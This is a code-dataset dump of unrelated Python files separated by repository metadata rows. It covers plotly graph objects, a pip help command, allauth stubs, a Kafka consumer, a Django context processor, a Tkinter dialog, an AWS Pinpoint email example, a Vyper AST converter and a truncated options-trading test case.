def x(self):
"""
The 'x' property is an instance of X
that may be specified as:
- An instance of plotly.graph_objs.isosurface.caps.X
- A dict of string/value properties that will be passed
to the X constructor
Supported dict properties:
fill
Sets the fill ratio of the `caps`. The default
fill value of the `caps` is 1 meaning that they
are entirely shaded. On the other hand Applying
a `fill` ratio less than one would allow the
creation of openings parallel to the edges.
show
Sets the fill ratio of the `slices`. The
default fill value of the x `slices` is 1
meaning that they are entirely shaded. On the
other hand Applying a `fill` ratio less than
one would allow the creation of openings
parallel to the edges.
Returns
-------
plotly.graph_objs.isosurface.caps.X
"""
return self['x']
@x.setter
def x(self, val):
self['x'] = val
# y
# -
@property
def y(self):
"""
The 'y' property is an instance of Y
that may be specified as:
- An instance of plotly.graph_objs.isosurface.caps.Y
- A dict of string/value properties that will be passed
to the Y constructor
Supported dict properties:
fill
Sets the fill ratio of the `caps`. The default
fill value of the `caps` is 1 meaning that they
are entirely shaded. On the other hand Applying
a `fill` ratio less than one would allow the
creation of openings parallel to the edges.
show
Sets the fill ratio of the `slices`. The
default fill value of the y `slices` is 1
meaning that they are entirely shaded. On the
other hand Applying a `fill` ratio less than
one would allow the creation of openings
parallel to the edges.
Returns
-------
plotly.graph_objs.isosurface.caps.Y
"""
return self['y']
@y.setter
def y(self, val):
self['y'] = val
# z
# -
@property
def z(self):
"""
The 'z' property is an instance of Z
that may be specified as:
- An instance of plotly.graph_objs.isosurface.caps.Z
- A dict of string/value properties that will be passed
to the Z constructor
Supported dict properties:
fill
Sets the fill ratio of the `caps`. The default
fill value of the `caps` is 1 meaning that they
are entirely shaded. On the other hand Applying
a `fill` ratio less than one would allow the
creation of openings parallel to the edges.
show
Sets the fill ratio of the `slices`. The
default fill value of the z `slices` is 1
meaning that they are entirely shaded. On the
other hand Applying a `fill` ratio less than
one would allow the creation of openings
parallel to the edges.
Returns
-------
plotly.graph_objs.isosurface.caps.Z
"""
return self['z']
@z.setter
def z(self, val):
self['z'] = val
# property parent name
# --------------------
@property
def _parent_path_str(self):
return 'isosurface'
# Self properties description
# ---------------------------
@property
def _prop_descriptions(self):
return """\
x
plotly.graph_objs.isosurface.caps.X instance or dict
with compatible properties
y
plotly.graph_objs.isosurface.caps.Y instance or dict
with compatible properties
z
plotly.graph_objs.isosurface.caps.Z instance or dict
with compatible properties
"""
def __init__(self, arg=None, x=None, y=None, z=None, **kwargs):
"""
Construct a new Caps object
Parameters
----------
arg
dict of properties compatible with this constructor or
an instance of plotly.graph_objs.isosurface.Caps
x
plotly.graph_objs.isosurface.caps.X instance or dict
with compatible properties
y
plotly.graph_objs.isosurface.caps.Y instance or dict
with compatible properties
z
plotly.graph_objs.isosurface.caps.Z instance or dict
with compatible properties
Returns
-------
Caps
"""
super(Caps, self).__init__('caps')
# Validate arg
# ------------
if arg is None:
arg = {}
elif isinstance(arg, self.__class__):
arg = arg.to_plotly_json()
elif isinstance(arg, dict):
arg = _copy.copy(arg)
else:
raise ValueError(
"""\
The first argument to the plotly.graph_objs.isosurface.Caps
constructor must be a dict or
an instance of plotly.graph_objs.isosurface.Caps"""
)
# Handle skip_invalid
# -------------------
self._skip_invalid = kwargs.pop('skip_invalid', False)
# Import validators
# -----------------
from plotly.validators.isosurface import (caps as v_caps)
# Initialize validators
# ---------------------
self._validators['x'] = v_caps.XValidator()
self._validators['y'] = v_caps.YValidator()
self._validators['z'] = v_caps.ZValidator()
# Populate data dict with properties
# ----------------------------------
_v = arg.pop('x', None)
self['x'] = x if x is not None else _v
_v = arg.pop('y', None)
self['y'] = y if y is not None else _v
_v = arg.pop('z', None)
self['z'] = z if z is not None else _v
# Process unknown kwargs
# ----------------------
self._process_kwargs(**dict(arg, **kwargs))
# Reset skip_invalid
# ------------------
self._skip_invalid = False
from plotly.graph_objs.isosurface import slices
from plotly.graph_objs.isosurface import hoverlabel
from plotly.graph_objs.isosurface import colorbar
from plotly.graph_objs.isosurface import caps
| [
"[email protected]"
] | |
e4542b8b5cbb4bef96ff785702f56111f3fe58f4 | 768058e7f347231e06a28879922690c0b6870ed4 | /venv/lib/python3.7/site-packages/pip-10.0.1-py3.7.egg/pip/_internal/commands/help.py | 386278cf5f1461bd429c082c29df90b3b868a0cf | [] | no_license | jciech/HeisenbergSpinChains | 58b4238281d8c158b11c6c22dd0da82025fd7284 | e43942bbd09f6675e7e2ff277f8930dc0518d08e | refs/heads/master | 2022-12-18T08:04:08.052966 | 2020-09-29T12:55:00 | 2020-09-29T12:55:00 | 258,476,448 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,044 | py | from __future__ import absolute_import
from pip._internal.basecommand import SUCCESS, Command
from pip._internal.exceptions import CommandError
class HelpCommand(Command):
"""Show help for commands"""
name = "help"
usage = """
%prog <command>"""
summary = "Show help for commands."
ignore_require_venv = True
def run(self, options, args):
from pip._internal.commands import commands_dict, get_similar_commands
try:
# 'pip help' with no args is handled by pip.__init__.parseopt()
cmd_name = args[0] # the command we need help for
except IndexError:
return SUCCESS
if cmd_name not in commands_dict:
guess = get_similar_commands(cmd_name)
msg = ['unknown command "%s"' % cmd_name]
if guess:
msg.append('maybe you meant "%s"' % guess)
raise CommandError(" - ".join(msg))
command = commands_dict[cmd_name]()
command.parser.print_help()
return SUCCESS
| [
"[email protected]"
] | |
6383c420b4d765598ded8fa8b7e09a41780ee859 | 5761eca23af5ad071a9b15e2052958f2c9de60c0 | /generated-stubs/allauth/socialaccount/providers/weixin/views.pyi | ab4087168efbf7f077d1dc53cf0dcb35eb434d7a | [] | no_license | d-kimuson/drf-iframe-token-example | 3ed68aa4463531f0bc416fa66d22ee2aaf72b199 | dd4a1ce8e38de9e2bf90455e3d0842a6760ce05b | refs/heads/master | 2023-03-16T13:52:45.596818 | 2021-03-09T22:09:49 | 2021-03-09T22:09:49 | 346,156,450 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 973 | pyi | from .client import WeixinOAuth2Client as WeixinOAuth2Client
from .provider import WeixinProvider as WeixinProvider
from allauth.account import app_settings as app_settings
from allauth.socialaccount.providers.oauth2.views import OAuth2Adapter as OAuth2Adapter, OAuth2CallbackView as OAuth2CallbackView, OAuth2LoginView as OAuth2LoginView
from allauth.utils import build_absolute_uri as build_absolute_uri
from typing import Any
class WeixinOAuth2Adapter(OAuth2Adapter):
provider_id: Any = ...
access_token_url: str = ...
profile_url: str = ...
@property
def authorize_url(self): ...
def complete_login(self, request: Any, app: Any, token: Any, **kwargs: Any): ...
class WeixinOAuth2ClientMixin:
def get_client(self, request: Any, app: Any): ...
class WeixinOAuth2LoginView(WeixinOAuth2ClientMixin, OAuth2LoginView): ...
class WeixinOAuth2CallbackView(WeixinOAuth2ClientMixin, OAuth2CallbackView): ...
oauth2_login: Any
oauth2_callback: Any
| [
"[email protected]"
] | |
5ac9b4d7308eaba4eff0b9657389f4c3652b5b94 | ebdeaa70f6e30abab03a1589bcdd56d1339151ef | /day14Python对象3/02-添加子类属性.py | e7ac08d531ca166a266198f0171a8931da24f600 | [] | no_license | gilgameshzzz/learn | 490d8eb408d064473fdbfa3f1f854c2f163a7ef6 | d476af77a6163ef4f273087582cbecd7f2ec15e6 | refs/heads/master | 2020-03-31T11:32:42.909453 | 2018-11-22T03:34:45 | 2018-11-22T03:34:45 | 152,181,143 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,547 | py | # Filename : 02-添加子类属性.py
# Date : 2018/8/2
"""
对象属性的继承:是通过继承init方法来继承的对象属性
给当前类添加对象属性:重写init方法,如果需要保留父类的对象属性,需要使用
super()去调用父类的init方法
多态:同一个事物有多种形态,子类继承父类的方法,可以对方法进行重写,
一个方法就有多种形态(多态的表现)
类的多态:继承产生多态
"""
class Person:
def __init__(self, name='', age=2):
self.name = name
self.age = age
class Staff(Person):
# init方法的参数:保证在创建对象的时候就可以给某些属性赋值
def __init__(self, name):
super().__init__(name)
self.salary = 0
if __name__ == '__main__':
s1 = Person()
s1.__init__('wd', 12)
print(s1.name, s1.age)
# 练习
"""
声明人类,有属性,名字、年龄、性别。身高
要求创建人的对象的时候可以给名字、性别、年龄赋初值
再创建学生类继承自人类,拥有人类的所有的属性,再添加学号、
成绩、电话属性
要求创建学生对象的时候可以给名字、年龄和电话赋初值
"""
class Human:
def __init__(self, name, age=0, sex='男'):
self.name = name
self.height = 0
self.age = age
self.sex = sex
class Student(Human):
def __init__(self, name, age, tel):
super().__init__(self, name, age)
self.score = 0
self.id_num = 0
self.tel = 13
| [
"[email protected]"
] | |
2d1003eb12e4578cbb09e2a2b23226e356bffd3e | 80c8d4e84f2ea188a375ff920a4adbd9edaed3a1 | /bigdata_study/pyflink1.x/pyflink_learn/examples/4_window/sink_monitor.py | f9435ee7aaed197828b8fafad6f66d9fa6cace97 | [
"MIT"
] | permissive | Birkid/penter | 3a4b67801d366db15ca887c31f545c8cda2b0766 | 0200f40c9d01a84c758ddcb6a9c84871d6f628c0 | refs/heads/master | 2023-08-22T14:05:43.106499 | 2021-10-20T07:10:10 | 2021-10-20T07:10:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,191 | py | """
读取 kafka 的用户操作数据并打印
"""
from kafka import KafkaConsumer
from reprint import output
import json
topic = 'click_rank'
bootstrap_servers = ['localhost:9092']
group_id = 'group7'
consumer = KafkaConsumer(
topic, # topic的名称
group_id=group_id, # 指定此消费者实例属于的组名,可以不指定
bootstrap_servers=bootstrap_servers, # 指定kafka服务器
auto_offset_reset='latest', # 'smallest': 'earliest', 'largest': 'latest'
)
with output(output_type="list", initial_len=22, interval=0) as output_lines:
# 初始化打印行
output_lines[0] = '=== 男 ==='
output_lines[6] = '=== 女 ==='
for msg in consumer:
# 解析结果
data = json.loads(msg.value)
start_index = 1 if data['sex'] == '男' else 7
rank = json.loads('[' + data['top10'] + ']')
# 逐行打印
for i in range(5):
index = start_index + i
if i < len(rank):
name = list(rank[i].keys())[0]
value = list(rank[i].values())[0]
output_lines[index] = f'{name:6s} {value}'
else:
output_lines[index] = ''
| [
"[email protected]"
] | |
25a39bfe0961decc5e8a5665dfe83a66b05dbd27 | 18430833920b3193d2f26ed526ca8f6d7e3df4c8 | /src/notifications/context_processors.py | f80de60ee43e53ffde101052edf945953ac0c19e | [
"MIT"
] | permissive | providenz/phase | ed8b48ea51d4b359f8012e603b328adf13d5e535 | b0c46a5468eda6d4eae7b2b959c6210c8d1bbc60 | refs/heads/master | 2021-01-17T06:56:07.842719 | 2016-06-28T11:17:53 | 2016-06-28T11:17:53 | 47,676,508 | 0 | 0 | null | 2015-12-09T07:45:19 | 2015-12-09T07:45:18 | null | UTF-8 | Python | false | false | 991 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.contrib.auth.models import AnonymousUser
from django.conf import settings
from notifications.models import Notification
def notifications(request):
"""Fetches data required to render navigation menu.
The main menu contains the list of user categories to choose.
Here is the query to fetch them.
"""
user = getattr(request, 'user')
context = {}
if not isinstance(user, AnonymousUser):
qs = Notification.objects \
.filter(user=user) \
.order_by('-created_on')
notifications = list(qs[0:settings.DISPLAY_NOTIFICATION_COUNT])
if len(notifications) > 0:
has_new_notifications = (not notifications[0].seen)
else:
has_new_notifications = False
context.update({
'notifications': notifications,
'has_new_notifications': has_new_notifications,
})
return context
| [
"[email protected]"
] | |
e270360c2e7314eb2a69a82872043984e52ce1b4 | 70ba2c6f45bf036cf8e2860003ee03ef2de7842c | /apps/registro_hora_extra/models.py | c2e70f1ef58c47a87e4baec3d3f2f58225e2e7a5 | [] | no_license | Izaiasjun1Dev/gestao_rh | b99d0ba767ad136ba596c8da388ec184e19b5aae | 29830e5d7e1eed5eec93548ee31b19a4c6d62797 | refs/heads/master | 2022-01-26T00:57:10.561760 | 2019-07-31T17:56:25 | 2019-07-31T17:56:25 | 199,683,872 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 167 | py | from django.db import models
class Registro_Hora_Extra(models.Model):
motivo = models.CharField(max_length=100)
def __str__(self):
return self.motivo | [
"[email protected]"
] | |
db5fc913c50c24d9c3bb985ff8799f82103afce3 | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/454/usersdata/302/106280/submittedfiles/programa.py | ca76871b6b4cba21f2e253a7a5ef79930a322905 | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 164 | py | # -*- coding: utf-8 -*-
c = int(input('Digite o número de consultas:'))
for i in range(c):
c.append(int(input('Digite a consulta %d: %(i+1))))
print(c)
| [
"[email protected]"
] | |
20a5737230bac56977780a12595c131b8523268d | 9fa8c280571c099c5264960ab2e93255d20b3186 | /system/scientist/panel/control/stop_criterion/view.py | 76a6fe614d545726fcac47b3131dbcdefb304689 | [
"MIT"
] | permissive | thuchula6792/AutoOED | 8dc97191a758200dbd39cd850309b0250ac77cdb | 272d88be7ab617a58d3f241d10f4f9fd17b91cbc | refs/heads/master | 2023-07-23T16:06:13.820272 | 2021-09-08T14:22:18 | 2021-09-08T14:22:18 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,417 | py | import tkinter as tk
from system.gui.widgets.factory import create_widget
class StopCriterionView:
def __init__(self, root_view):
self.root_view = root_view
self.window = create_widget('toplevel', master=self.root_view.root_view.root, title='Stopping Criterion')
self.widget = {
'var': {},
'entry': {},
}
frame_options = create_widget('frame', master=self.window, row=0, column=0, padx=0, pady=0)
self.name_options = {'time': 'Time', 'n_iter': 'Number of iterations', 'n_sample': 'Number of samples', 'hv': 'Hypervolume value', 'hv_conv': 'Hypervolume convergence'}
def check(var, entry):
if var.get() == 1:
entry.enable()
else:
entry.disable()
frame_time = create_widget('frame', master=frame_options, row=0, column=0)
self.widget['var']['time'] = tk.IntVar()
cb_time = tk.Checkbutton(master=frame_time, variable=self.widget['var']['time'], highlightthickness=0, bd=0)
cb_time.grid(row=0, column=0, sticky='W')
tk.Label(master=frame_time, text=self.name_options['time'] + ': stop after').grid(row=0, column=1, sticky='W')
self.widget['entry']['time'] = create_widget('entry', master=frame_time, row=0, column=2, class_type='float',
required=True, valid_check=lambda x: x > 0, error_msg='time limit must be positive', pady=0)
tk.Label(master=frame_time, text='seconds').grid(row=0, column=3, sticky='W')
cb_time.configure(command=lambda: check(self.widget['var']['time'], self.widget['entry']['time']))
frame_n_iter = create_widget('frame', master=frame_options, row=1, column=0)
self.widget['var']['n_iter'] = tk.IntVar()
cb_n_iter = tk.Checkbutton(master=frame_n_iter, variable=self.widget['var']['n_iter'], highlightthickness=0, bd=0)
cb_n_iter.grid(row=0, column=0, sticky='W')
tk.Label(master=frame_n_iter, text=self.name_options['n_iter'] + ': stop after').grid(row=0, column=1, sticky='W')
self.widget['entry']['n_iter'] = create_widget('entry', master=frame_n_iter, row=0, column=2, class_type='int',
required=True, valid_check=lambda x: x > 0, error_msg='number of iterations must be positive', pady=0)
tk.Label(master=frame_n_iter, text='iterations').grid(row=0, column=3, sticky='W')
cb_n_iter.configure(command=lambda: check(self.widget['var']['n_iter'], self.widget['entry']['n_iter']))
frame_n_sample = create_widget('frame', master=frame_options, row=2, column=0)
self.widget['var']['n_sample'] = tk.IntVar()
cb_n_sample = tk.Checkbutton(master=frame_n_sample, variable=self.widget['var']['n_sample'], highlightthickness=0, bd=0)
cb_n_sample.grid(row=0, column=0, sticky='W')
tk.Label(master=frame_n_sample, text=self.name_options['n_sample'] + ': stop when number of samples reaches').grid(row=0, column=1, sticky='W')
self.widget['entry']['n_sample'] = create_widget('entry', master=frame_n_sample, row=0, column=2, class_type='int',
required=True, valid_check=lambda x: x > 0, error_msg='number of samples must be positive', pady=0)
cb_n_sample.configure(command=lambda: check(self.widget['var']['n_sample'], self.widget['entry']['n_sample']))
frame_hv = create_widget('frame', master=frame_options, row=3, column=0)
self.widget['var']['hv'] = tk.IntVar()
cb_hv = tk.Checkbutton(master=frame_hv, variable=self.widget['var']['hv'], highlightthickness=0, bd=0)
cb_hv.grid(row=0, column=0, sticky='W')
tk.Label(master=frame_hv, text=self.name_options['hv'] + ': stop when hypervolume reaches').grid(row=0, column=1, sticky='W')
self.widget['entry']['hv'] = create_widget('entry', master=frame_hv, row=0, column=2, class_type='float',
required=True, valid_check=lambda x: x > 0, error_msg='hypervolume value must be positive', pady=0)
cb_hv.configure(command=lambda: check(self.widget['var']['hv'], self.widget['entry']['hv']))
frame_hv_conv = create_widget('frame', master=frame_options, row=4, column=0)
self.widget['var']['hv_conv'] = tk.IntVar()
cb_hv_conv = tk.Checkbutton(master=frame_hv_conv, variable=self.widget['var']['hv_conv'], highlightthickness=0, bd=0)
cb_hv_conv.grid(row=0, column=0, sticky='W')
tk.Label(master=frame_hv_conv, text=self.name_options['hv_conv'] + ': stop when hypervolume stops to improve over past').grid(row=0, column=1, sticky='W')
self.widget['entry']['hv_conv'] = create_widget('entry', master=frame_hv_conv, row=0, column=2, class_type='int',
required=True, valid_check=lambda x: x > 0, error_msg='number of iterations must be positive', pady=0)
tk.Label(master=frame_hv_conv, text='iterations').grid(row=0, column=3, sticky='W')
cb_hv_conv.configure(command=lambda: check(self.widget['var']['hv_conv'], self.widget['entry']['hv_conv']))
for key in self.name_options:
self.widget['entry'][key].disable()
frame_action = create_widget('frame', master=self.window, row=1, column=0, pady=0, sticky=None)
self.widget['save'] = create_widget('button', master=frame_action, row=0, column=0, text='Save')
self.widget['cancel'] = create_widget('button', master=frame_action, row=0, column=1, text='Cancel') | [
"[email protected]"
] | |
0e1c84c3ad5515132006c028d0ce7d87bdfbc4e2 | c8c77f6cc6c032daf179ea2138e4dda5473b426b | /pinpoint-email/pinpoint_send_email_message_email_api.py | c607d8762534d68c7b98210c7dd0bc37ba9ccd58 | [] | no_license | arunmastermind/AWS-examples-using-BOTO3 | b411a6c96011ab58a66952a53fa2938cb58d5135 | e8390094374c10902bab016a21caba75ea179b5a | refs/heads/master | 2020-09-30T13:34:33.657621 | 2019-12-11T12:37:44 | 2019-12-11T12:37:44 | 227,297,211 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 3,698 | py | import boto3
from botocore.exceptions import ClientError
# The AWS Region that you want to use to send the email.
AWS_REGION = "us-west-2"
# The "From" address. This address has to be verified in
# Amazon Pinpoint in the region you're using to send email.
SENDER = "Mary Major <[email protected]>"
# The addresses on the "To" line. If your Amazon Pinpoint account is in
# the sandbox, these addresses also have to be verified.
TOADDRESSES = ["[email protected]"]
# CC and BCC addresses. If your account is in the sandbox, these
# addresses have to be verified.
CCADDRESSES = ["[email protected]", "[email protected]"]
BCCADDRESSES = ["[email protected]"]
# The configuration set that you want to use to send the email.
CONFIGURATION_SET = "ConfigSet"
# The subject line of the email.
SUBJECT = "Amazon Pinpoint Test (SDK for Python)"
# The body of the email for recipients whose email clients don't support HTML
# content.
BODY_TEXT = """Amazon Pinpoint Test (SDK for Python)
-------------------------------------
This email was sent with Amazon Pinpoint using the AWS SDK for Python.
For more information, see https:#aws.amazon.com/sdk-for-python/
"""
# The body of the email for recipients whose email clients can display HTML
# content.
BODY_HTML = """<html>
<head></head>
<body>
<h1>Amazon Pinpoint Test (SDK for Python)</h1>
<p>This email was sent with
<a href='https:#aws.amazon.com/pinpoint/'>Amazon Pinpoint</a> using the
<a href='https:#aws.amazon.com/sdk-for-python/'>
AWS SDK for Python</a>.</p>
</body>
</html>
"""
# The message tags that you want to apply to the email.
TAG0 = {'Name': 'key0', 'Value': 'value0'}
TAG1 = {'Name': 'key1', 'Value': 'value1'}
# The character encoding that you want to use for the subject line and message
# body of the email.
CHARSET = "UTF-8"
# Create a new Pinpoint resource and specify a region.
client = boto3.client('pinpoint-email', region_name=AWS_REGION)
# Send the email.
try:
# Create a request to send the email. The request contains all of the
# message attributes and content that were defined earlier.
response = client.send_email(
FromEmailAddress=SENDER,
# An object that contains all of the email addresses that you want to
# send the message to. You can send a message to up to 50 recipients in
# a single call to the API.
Destination={
'ToAddresses': TOADDRESSES,
'CcAddresses': CCADDRESSES,
'BccAddresses': BCCADDRESSES
},
# The body of the email message.
Content={
# Create a new Simple message. If you need to include attachments,
# you should send a RawMessage instead.
'Simple': {
'Subject': {
'Charset': CHARSET,
'Data': SUBJECT,
},
'Body': {
'Html': {
'Charset': CHARSET,
'Data': BODY_HTML
},
'Text': {
'Charset': CHARSET,
'Data': BODY_TEXT,
}
}
}
},
# The configuration set that you want to use when you send this message.
ConfigurationSetName=CONFIGURATION_SET,
EmailTags=[
TAG0,
TAG1
]
)
# Display an error if something goes wrong.
except ClientError as e:
print("The message wasn't sent. Error message: \"" + e.response['Error']['Message'] + "\"")
else:
print("Email sent!")
print("Message ID: " + response['MessageId']) | [
"[email protected]"
] | |
89aadd7f9dd9e91da3e1da7db4d4e2395ffb8883 | 93b495b3624399c81b7edb39d1f6c5cebb2cd987 | /vyper/ast.py | 445bdf16b1ecb9ebfb855d44e98e25836353f5e9 | [
"Apache-2.0"
] | permissive | fubuloubu/vyper-redux | bf4b91d00290e5ed063ce74b44b740af6c3afae7 | a190c69083a968136ce10d1ceb68e42e41ff9de1 | refs/heads/master | 2020-12-20T16:29:44.390444 | 2020-01-25T07:53:23 | 2020-01-25T07:53:23 | 236,137,024 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,683 | py | import ast as py_ast
import inspect
import sys
from typing import (
Any,
Dict,
List,
Tuple,
Type,
Union,
)
import lark
import stringcase
class Ast(py_ast.AST):
_fields = ()
class Module(Ast):
_fields = ('methods',)
def __init__(self, children: List[Union[lark.Tree, lark.Token]]):
self.methods, children = split_ast(children, Method)
self.variables, children = split_ast(children, Variable)
assert len(children) == 0, f"Did not save everything: {children}"
class Method(Ast):
_fields = (
'decorators',
'name',
'parameters',
'body',
)
def __init__(self, children: List[Union[lark.Tree, lark.Token]]):
decorators_node, children = split_tree(children, "decorators")
assert len(decorators_node) <= 1, "Should not have more than 1 set of decorators"
self.decorators = decorators_node[0].children
method_type, children = split_tree(children, "method_type")
assert len(method_type) == 1, "Should not have more than 1 method_type"
method_type = convert_to_dict(method_type[0].children)
self.name = method_type['NAME']
self.parameters = method_type.get('parameters', None)
body, children = split_tree(children, "body")
assert len(body) == 1, "Should not have more than 1 body"
self.body = body[0].children
assert len(children) == 0, f"Did not save everything: {children}"
class Decorator(Ast):
_fields = (
'type',
)
def __init__(self, children: List[Union[lark.Tree, lark.Token]]):
assert len(children) == 1
assert children[0].type == 'DECORATOR_NAME'
self.type = children[0].value
class Statement(Ast):
pass
class PassStmt(Statement):
def __init__(self, children: List[Union[lark.Tree, lark.Token]]):
pass # NOTE: Check later for only statement in body
class ExprStmt(Statement):
_fields = (
'assignment',
'expression',
)
def __init__(self, children: List[Union[lark.Tree, lark.Token]]):
assert len(children) == 2
self.assignment = children[0]
self.expression = children[1]
class Var(Ast):
_fields = (
'name',
'type',
)
def __init__(self, children: List[Union[lark.Tree, lark.Token]]):
properties = convert_to_dict(children)
self.name = properties['NAME']
self.type = properties.get('TYPE', None) # NOTE: Do not know type yet if none
class Variable(Ast):
_fields = (
'name',
'type',
'public',
)
def __init__(self, children: List[Union[lark.Tree, lark.Token]]):
properties = convert_to_dict(children)
if 'with_getter' in properties.keys():
self.public = True
properties = properties['with_getter']
else:
self.public = False
self.name = properties['NAME']
self.type = get_type(properties)
class Parameter(Variable):
pass
class Attribute(Var):
_fields = (
'var',
'property',
)
def __init__(self, children: List[Union[lark.Tree, lark.Token]]):
assert len(children) == 2
self.var = children[0]
properties = convert_to_dict(children[1])
self.property = properties['NAME']
def split_ast(
nodes: List[Ast],
ast_type: Type[Ast],
) -> Tuple[List[Ast], List[Ast]]:
selected = [n for n in nodes if isinstance(n, ast_type)]
others = [n for n in nodes if not isinstance(n, ast_type)]
return selected, others
def split_tree(
nodes: List[lark.Tree],
rule_type: str,
) -> Tuple[List[lark.Tree], List[lark.Tree]]:
selected = [n for n in nodes if n.data == rule_type]
others = [n for n in nodes if n.data != rule_type]
return selected, others
def convert_to_dict(
node: Union[List[Union[lark.Tree, lark.Token, Ast]], Union[lark.Tree, lark.Token, Ast]],
) -> Dict:
if isinstance(node, lark.Token):
return {node.type: node.value}
elif isinstance(node, lark.Tree):
return {node.data: convert_to_dict(node.children)}
elif isinstance(node, list):
obj = list()
for n in node:
attr = convert_to_dict(n)
obj.append(attr)
minified_obj = dict()
for item in obj:
if isinstance(item, dict) and all([k not in minified_obj.keys() for k in item.keys()]):
minified_obj.update(item)
else:
return obj # Give up an abort
return minified_obj
elif isinstance(node, Ast):
return node
else:
raise ValueError(f"Cannot convert {node}.")
def get_type(properties: Dict[str, Any]) -> str:
if 'storage' in properties.keys():
return get_type(properties['storage'])
if 'abi_type' in properties.keys():
return get_type(properties['abi_type'])
if 'memory' in properties.keys():
return get_type(properties['memory'])
if 'BASIC_TYPE' in properties.keys():
return properties['BASIC_TYPE']
raise ValueError(f"Could not process {properties}.")
def _get_ast_classes():
ast_classes = dict()
for name, obj in inspect.getmembers(sys.modules[__name__]):
if inspect.isclass(obj) and issubclass(obj, Ast):
ast_classes[name] = obj
return ast_classes
AST_CLASSES = _get_ast_classes()
class AstConverter(lark.Transformer):
def __init__(self, *args, **kwargs):
for name, ast_class in _get_ast_classes().items():
# NOTE: Convention is for classnames to be CamalCase,
# but Lark rules are snake_case
setattr(self, stringcase.snakecase(name), ast_class)
super().__init__(*args, **kwargs)
class _CheckLarkConversionFailures(py_ast.NodeVisitor):
def visit(self, node):
node_class = node.__class__.__name__
for member_name in node._fields:
member = getattr(node, member_name)
if isinstance(member, (lark.Tree, lark.Token)):
raise ValueError(
f"Could not convert {member_name} in {node_class}: {member}"
)
if isinstance(member, list):
for item in member:
if isinstance(item, (lark.Tree, lark.Token)):
raise ValueError(
f"Could not convert {member_name} in {node_class}: {item}"
)
super().visit(node)
def ast_parse(parse_tree: lark.Tree) -> Ast:
ast = AstConverter().transform(parse_tree)
_CheckLarkConversionFailures().visit(ast)
return ast
| [
"[email protected]"
] | |
890fd3b5525d78b3bddbc5f55ff21303da111d0b | b4f203f487c0425fc2996079829715f48f06689b | /test2.py | 80d5b14539e4dddde2c4233542974efd336b1d4f | [] | no_license | seunggue/AI-school-project | 1232a6bb91a5e492289dcff1dec3c12d747e53a1 | ceaad7808a86b09062203845cab603fe71ea15c5 | refs/heads/master | 2022-12-12T08:37:51.067589 | 2020-08-30T16:33:08 | 2020-08-30T16:33:08 | 290,980,528 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 25 | py | a = '12345'
print(a[:-3]) | [
"[email protected]"
] | |
adcc7a4f456face62e0edc4a15503cb7ef48c86e | d3efc82dfa61fb82e47c82d52c838b38b076084c | /Autocase_Result/XjShRightSide/YW_GGQQ_QLFXJHA_086.py | 6a72b553056082e63709d5549fef6af05775698c | [] | no_license | nantongzyg/xtp_test | 58ce9f328f62a3ea5904e6ed907a169ef2df9258 | ca9ab5cee03d7a2f457a95fb0f4762013caa5f9f | refs/heads/master | 2022-11-30T08:57:45.345460 | 2020-07-30T01:43:30 | 2020-07-30T01:43:30 | 280,388,441 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,894 | py | #!/usr/bin/python
# -*- encoding: utf-8 -*-
import sys
import json
sys.path.append("/home/yhl2/workspace/xtp_test/xtp/api")
from xtp_test_case import *
sys.path.append("/home/yhl2/workspace/xtp_test/option/service")
from OptMainService import *
from OptQueryStkPriceQty import *
sys.path.append("/home/yhl2/workspace/xtp_test/service")
from log import *
from CaseParmInsertMysql import *
sys.path.append("/home/yhl2/workspace/xtp_test/option/mysql")
from Opt_SqlData_Transfer import *
sys.path.append("/home/yhl2/workspace/xtp_test/mysql")
from QueryOrderErrorMsg import queryOrderErrorMsg
sys.path.append("/home/yhl2/workspace/xtp_test/utils")
from env_restart import *
reload(sys)
sys.setdefaultencoding('utf-8')
class YW_GGQQ_QLFXJHA_086(xtp_test_case):
def setUp(self):
sql_transfer = Opt_SqlData_Transfer()
sql_transfer.transfer_fund_asset('YW_GGQQ_QLFXJHA_086')
clear_data_and_restart_sh()
Api.trade.Logout()
Api.trade.Login()
def test_YW_GGQQ_QLFXJHA_086(self):
title = '卖平(权利方平仓):限价-验资(可用资金刚好)(下单金额<费用&&可用资金=(费用-下单金额))'
# 定义当前测试用例的期待值
# 期望状态:初始、未成交、部成、全成、部撤已报、部撤、已报待撤、已撤、废单、撤废、内部撤单
# xtp_ID和cancel_xtpID默认为0,不需要变动
case_goal = {
'期望状态': '全成',
'errorID': 0,
'errorMSG': '',
'是否生成报单': '是',
'是否是撤废': '否',
'xtp_ID': 0,
'cancel_xtpID': 0,
}
logger.warning(title)
# 定义委托参数信息------------------------------------------
# 参数:证券代码、市场、证券类型、证券状态、交易状态、买卖方向(B买S卖)、期望状态、Api
stkparm = QueryStkPriceQty('10001032', '1', '*', '1', '0', '*', case_goal['期望状态'], Api)
# 如果下单参数获取失败,则用例失败
if stkparm['返回结果'] is False:
rs = {
'用例测试结果': stkparm['返回结果'],
'测试错误原因': '获取下单参数失败,' + stkparm['错误原因'],
}
logger.error('查询结果为False,错误原因: {0}'.format(
json.dumps(rs['测试错误原因'], encoding='UTF-8', ensure_ascii=False)))
self.assertEqual(rs['用例测试结果'], True)
else:
wt_reqs = {
'business_type':Api.const.XTP_BUSINESS_TYPE['XTP_BUSINESS_TYPE_OPTION'],
'order_client_id':2,
'market': Api.const.XTP_MARKET_TYPE['XTP_MKT_SH_A'],
'ticker': stkparm['证券代码'],
'side': Api.const.XTP_SIDE_TYPE['XTP_SIDE_SELL'],
